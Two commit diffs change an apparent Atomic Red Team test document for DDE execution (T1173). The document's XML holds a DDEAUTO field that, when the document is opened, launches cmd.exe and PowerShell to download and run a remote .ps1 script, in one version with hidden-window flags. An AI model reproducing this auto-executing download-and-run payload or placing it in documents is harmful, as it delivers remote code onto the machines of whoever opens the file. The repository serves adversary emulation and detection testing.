<commit_message>
update download path for ps1 to test
</commit_message>
<xml_diff>
--- a/atomics/T1173/bin/DDE Document.docx
+++ b/atomics/T1173/bin/DDE Document.docx
@@ -10,12 +10,12 @@
         <w:instrText xml:space="preserve"> </w:instrText>
       </w:r>
       <w:r>
-        <w:instrText>DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://github.com/apbeers/atomic-red-team/tree/master/atomics/T1173/s</w:instrText>
+        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/apbeers/atomic-red-team/T1173-Execute-PowerShell-Script-via-Word-DDE/atomics/T1173/src/PowerShell_Scri</w:instrText>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
       <w:r>
-        <w:instrText>rc/PowerShell_Script_For_DDE_Document.ps1');powershell -e $e "</w:instrText>
+        <w:instrText>pt_For_DDE_Document.ps1');powershell -e $e "</w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>

</xml_diff>

<commit_message>
update path to point to redcanary repo. Once this is merged in it will download the file
</commit_message>
<xml_diff>
--- a/atomics/T1173/bin/DDE Document.docx
+++ b/atomics/T1173/bin/DDE Document.docx
@@ -10,12 +10,21 @@
         <w:instrText xml:space="preserve"> </w:instrText>
       </w:r>
       <w:r>
-        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/apbeers/atomic-red-team/T1173-Execute-PowerShell-Script-via-Word-DDE/atomics/T1173/src/PowerShell_Scri</w:instrText>
+        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/</w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> </w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText>redcanaryco</w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText>/atomic-red-team/T1173-Execute-PowerShell-Script-via-Word-</w:instrText>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
       <w:r>
-        <w:instrText>pt_For_DDE_Document.ps1');powershell -e $e "</w:instrText>
+        <w:instrText>DDE/atomics/T1173/src/PowerShell_Script_For_DDE_Document.ps1');powershell -e $e "</w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>

</xml_diff>